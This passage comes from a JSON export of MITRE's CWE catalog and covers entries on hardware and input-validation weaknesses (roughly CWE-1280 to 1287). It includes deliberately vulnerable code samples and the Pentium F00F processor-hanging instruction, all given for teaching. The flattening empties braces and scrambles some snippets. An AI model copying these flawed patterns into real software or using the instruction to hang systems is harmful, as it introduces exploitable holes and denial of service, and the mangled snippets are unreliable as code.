(!rst_n)elseend","attr":{"@_style":"margin-left:10px"},"xhtml:br":"","xhtml:div":[{"#text":"data_out = 0;","attr":{"@_style":"margin-left:10px"}},{"#text":"data_out = (grant_access) ? data_in : data_out;assign grant_access = (usr_id == 3\u2019h4) ? 1\u2019b1 : 1\u2019b0;","attr":{"@_style":"margin-left:10px"},"xhtml:br":""}]}}},{"attr":{"@_Nature":"good","@_Language":"Verilog"},"xhtml:p":"Flipping the order of the assignment of data_out and grant_access should solve the problem. The correct snippet of code is shown below.","xhtml:div":["always @ (posedge clk or negedge rst_n)","begin",{"#text":"if (!rst_n)elseend","attr":{"@_style":"margin-left:10px"},"xhtml:div":[{"#text":"data_out = 0;","attr":{"@_style":"margin-left:10px"}},{"#text":"assign grant_access = (usr_id == 3\u2019h4) ? 1\u2019b1 : 1\u2019b0;data_out = (grant_access) ? data_in : data_out;","attr":{"@_style":"margin-left:10px"},"xhtml:br":""}]},"endmodule"]}],"Body_Text":"This code uses Verilog blocking assignments for data_out and grant_access. Therefore, these assignments happen sequentially (i.e., data_out is updated to new value first, and grant_access is updated the next cycle) and not in parallel. Therefore, the asset data_out is allowed to be modified even before the access control check is complete and grant_access signal is set. Since grant_access does not have a reset value, it will be meta-stable and will randomly go to either 0 or 1."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Related_Attack_Patterns"}}},"1281":{"attr":{"@_ID":"1281","@_Name":"Sequence of Processor Instructions Leads to Unexpected Behavior","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Specific combinations of processor instructions lead to undesirable behavior such as locking the processor until a hard reset performed.","Extended_Description":{"xhtml:p":["If the instruction set architecture (ISA) and processor logic are not designed carefully, and tested thoroughly, certain combinations of instructions may lead to locking the processor or other unexpected and undesirable behavior.  Upon encountering unimplemented instruction opcodes or illegal instruction operands the processor should throw an exception and carry on without negatively impacting security.  However, specific combinations of legal and illegal instructions may cause unexpected behavior with security implications such as allowing unprivileged programs to completely lock the CPU.","Some examples are the Pentium f00f bug, MC6800 HCF, the Cyrix comma bug, and more generally other \\"Halt and Catch Fire\\" instructions."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Unexpected behavior from certain instruction combinations can arise from bugs in the ISA"},{"Phase":"Implementation","Note":"Unexpected behavior from certain instruction combinations can arise because of implementation details such as speculative execution, caching etc."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Implement a rigorous testing strategy that incorporates randomization to explore instruction sequences that are unlikely to appear in normal workloads in order to identify halt and catch fire instruction sequences."},{"Phase":"Patching and Maintenance","Description":"Patch operating system to avoid running Halt and Catch Fire type sequences or to mitigate the damage caused by unexpected behavior.  See [REF-1108]."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The Pentium F00F bug is a real-world example of how a sequence of instructions can lock a processor. The \u201ccmpxchg8b\u201d instruction compares contents of registers with a memory location.  The operand is expected to be a memory location, but in the bad code snippet it is the eax register. Because the specified operand is illegal, an exception is generated, which is the correct behavior and not a security issue in itself. However, when prefixed with the \u201clock\u201d instruction, the processor deadlocks because locked memory transactions require a read and write pair of transactions to occur before the lock on the memory bus is released. The exception causes a read to occur but there is no corresponding write, as there would have been if a legal operand had been supplied to the cmpxchg8b instruction.","Example_Code":{"#text":"lock cmpxchg8b eax","attr":{"@_Nature":"bad","@_Language":"Other"}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-1999-1476","Description":"A bug in some Intel Pentium processors allow DoS (hang) via an invalid \\"CMPXCHG8B\\" instruction, causing a deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1476"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"212"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1094"}},{"attr":{"@_External_Reference_ID":"REF-1108"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Sequence of Processor Instructions Leads to Unexpected Behavior (Halt and Catch Fire)","attr":{"@_Date":"2021-07-20"}}}},"1282":{"attr":{"@_ID":"1282","@_Name":"Assumed-Immutable Data is Stored in Writable Memory","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Immutable data, such as a first-stage bootloader, device identifiers, and \\"write-once\\" configuration settings are stored in writable memory that can be re-programmed or updated in the field.","Extended_Description":{"xhtml:p":"Security services such as secure boot, authentication of code and data, and device attestation all require assets such as the first stage bootloader, public keys, golden hash digests, etc. which are implicitly trusted. Storing these assets in read-only memory (ROM), fuses, or one-time programmable (OTP) memory provides strong integrity guarantees and provides a root of trust for securing the rest of the system. Security is lost if assets assumed to be immutable can be modified."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Keys, code, configuration settings, and other data should be programmed in write-once or read-only memory instead of writable memory."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"All immutable code or data should be programmed into ROM or write-once memory."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Cryptographic hash functions are commonly used to create unique fixed-length digests used to ensure the integrity of code and keys. A golden digest is stored on the device and compared to the digest computed from the data to be verified. If the digests match, the data has not been maliciously modified. If an attacker can modify the golden digest they then have the ability to store arbitrary data that passes the verification check. Hash digests used to verify public keys and early stage boot code should be immutable, with the strongest protection offered by hardware immutability."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Notes":{"Note":[{"#text":"This entry is still under development and will continue to\\n          see updates and content improvements.","attr":{"@_Type":"Maintenance"}},{"#text":"As of CWE 4.3, CWE-1282 and CWE-1233 are being investigated\\n\\t\\t  for potential duplication or overlap.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Assumed-Immutable Data Stored in Writable Memory","attr":{"@_Date":"2020-08-20"}}}},"1283":{"attr":{"@_ID":"1283","@_Name":"Mutable Attestation or Measurement Reporting Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The register contents used for attestation or measurement reporting data to verify boot flow are modifiable by an adversary.","Extended_Description":{"xhtml:p":"A System-on-Chip (SoC) implements secure boot or verified boot. During this boot flow, the SoC often measures the code that it authenticates. The measurement is usually done by calculating the one-way hash of the code binary and extending it to the previous hash. The hashing algorithm should be a Secure One-Way hash function. The final hash, i.e., the value obtained after the completion of the boot flow, serves as the measurement data used in reporting or in attestation. The calculated hash is often stored in registers that can later be read by the party of interest to determine tampering of the boot flow. A common weakness is that the contents in these registers are modifiable by an adversary, thus spoofing the measurement."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues can be introduced during hardware architecture or design and can be identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"If the access-controls which protecting the reporting registers are misconfigured during implementation, this weakness can arise."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Measurement data should be stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The SoC extends the hash and stores the results in registers. Without protection, an adversary can write their chosen hash values to these registers. Thus, the attacker controls the reported results.","Body_Text":{"xhtml:p":"To prevent the above scenario, the registers should have one or more of the following properties:","xhtml:ol":{"xhtml:li":["Should be Read-Only with respect to an adversary","Cannot be extended or modifiable either directly or indirectly (using a trusted agent as proxy) by an adversary","Should have appropriate access controls or protections"]}}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1107"}},{"attr":{"@_External_Reference_ID":"REF-1131"}}]},"Notes":{"Note":{"#text":"This entry is still in development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated References, Related_Attack_Patterns"}}},"1284":{"attr":{"@_ID":"1284","@_Name":"Improper Validation of Specified Quantity in Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to specify a quantity (such as size or length), but it does not validate or incorrectly validates that the quantity has the required properties.","Extended_Description":{"xhtml:p":"Specified quantities include size, length, frequency, price, rate, number of operations, time, and others. Code may rely on specified quantities to allocate resources, perform calculations, control iteration, etc. When the quantity is not properly validated, then attackers can specify malicious quantities to cause excessive resource allocation, trigger unexpected failures, enable buffer overflows, etc."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"Since quantities are used so often to affect resource allocation or process financial data, they are often present in many places in the code."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-135"},"Intro_Text":"This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...public static final double price = 20.00;int quantity = currentUser.getAttribute(\\"quantity\\");double total = price * quantity;chargeUser(total);...","xhtml:br":["","","","",""]}},"Body_Text":"The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited."},{"attr":{"@_Demonstrative_Example_ID":"DX-136"},"Intro_Text":"This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...#define MAX_DIM 100...int m,n, error;board_square_t *board;printf(\\"Please specify the board height: \\\\n\\");error = scanf(\\"%d\\", &amp;m);if ( EOF == error ){}printf(\\"Please specify the board width: \\\\n\\");error = scanf(\\"%d\\", &amp;n);if ( EOF == error ){}if ( m &gt; MAX_DIM || n &gt; MAX_DIM ) {}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));...","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":"/* board dimensions */","xhtml:div":[{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"Value too large: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1440","Description":"lack of validation of length field leads to infinite loop","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1440"},{"Reference":"CVE-2008-2374","Description":"lack of validation of string length fields allows memory consumption or buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2374"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1285":{"attr":{"@_ID":"1285","@_Name":"Improper Validation of Specified Index, Position, or Offset in Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to specify an index, position, or offset into an indexable resource such as a buffer or file, but it does not validate or incorrectly validates that the specified index/position/offset has the required properties.","Extended_Description":{"xhtml:p":"Often, indexable resources such as memory buffers or files can be accessed using a specific position, index, or offset, such as an index for an array or a position for a file.  When untrusted input is not properly validated before it is used as an index, attackers could access (or attempt to access) unauthorized portions of these resources.  This could be used to cause buffer overflows, excessive resource allocation, or trigger unexpected failures."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-134"},"Intro_Text":"The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &amp;num, &amp;size) == 2)","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &amp;num, &amp;size) == 2) {}","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (num &gt; 0 &amp;&amp; num &lt;= (unsigned)count)else","xhtml:div":[{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"report(stderr, \\"Warning: ignoring bogus data for message sizes returned by server.\\\\n\\");","xhtml:br":["",""],"xhtml:i":"/* warn about possible attempt to induce buffer overflow */"}}],"xhtml:br":""}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code."},{"attr":{"@_Demonstrative_Example_ID":"DX-133"},"Intro_Text":"In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"#text":"return products[index];","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = \\"\\";if ((index &gt;= 0) &amp;&amp; (index &lt; MAX_PRODUCTS)) {}else {}return productSummary;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"productSummary = products[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"index is out of bounds\\");throw new IndexOutOfBoundsException();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {} catch (IndexOutOfBoundsException ex) {...}","xhtml:br":["",""],"xhtml:div":{"#text":"productSummary = (String) productArray.get(index);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code.","An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds."]},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"User selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0369","Description":"large ID in packet used as array index","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0369"},{"Reference":"CVE-2001-1009","Description":"negative array index as argument to POP LIST command","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}}},"1286":{"attr":{"@_ID":"1286","@_Name":"Improper Validation of Syntactic Correctness of Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to be well-formed - i.e., to comply with a certain syntax - but it does not validate or incorrectly validates that the input complies with the syntax.","Extended_Description":{"xhtml:p":"Often, complex inputs are expected to follow a particular syntax, which is either assumed by the input itself, or declared within metadata such as headers. The syntax could be for data exchange formats, markup languages, or even programming languages.  When untrusted input is not properly validated for the expected syntax, attackers could cause parsing failures, trigger unexpected errors, or expose latent vulnerabilities that might not be directly exploitable if the input had conformed to the syntax."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code loads and parses an XML file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch(Exception ex) {}","xhtml:br":["",""],"xhtml:i":"// Read DOM","xhtml:div":[{"#text":"...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"The XML file is loaded without validating it against a known XML Schema or DTD."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-5893","Description":"HTTP request with missing protocol version number leads to crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5893"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"66"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1287":{"attr":{"@_ID":"1287","@_Name":"Improper Validation of Specified Type of Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.","Extended_Description":{"xhtml:p":["When input does not comply with the expected type, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities that would not be possible if the input conformed with the expected type.","This weakness can appear in type-unsafe programming languages, or in programming languages that support casting or conversion of an input to another type."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"843","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to 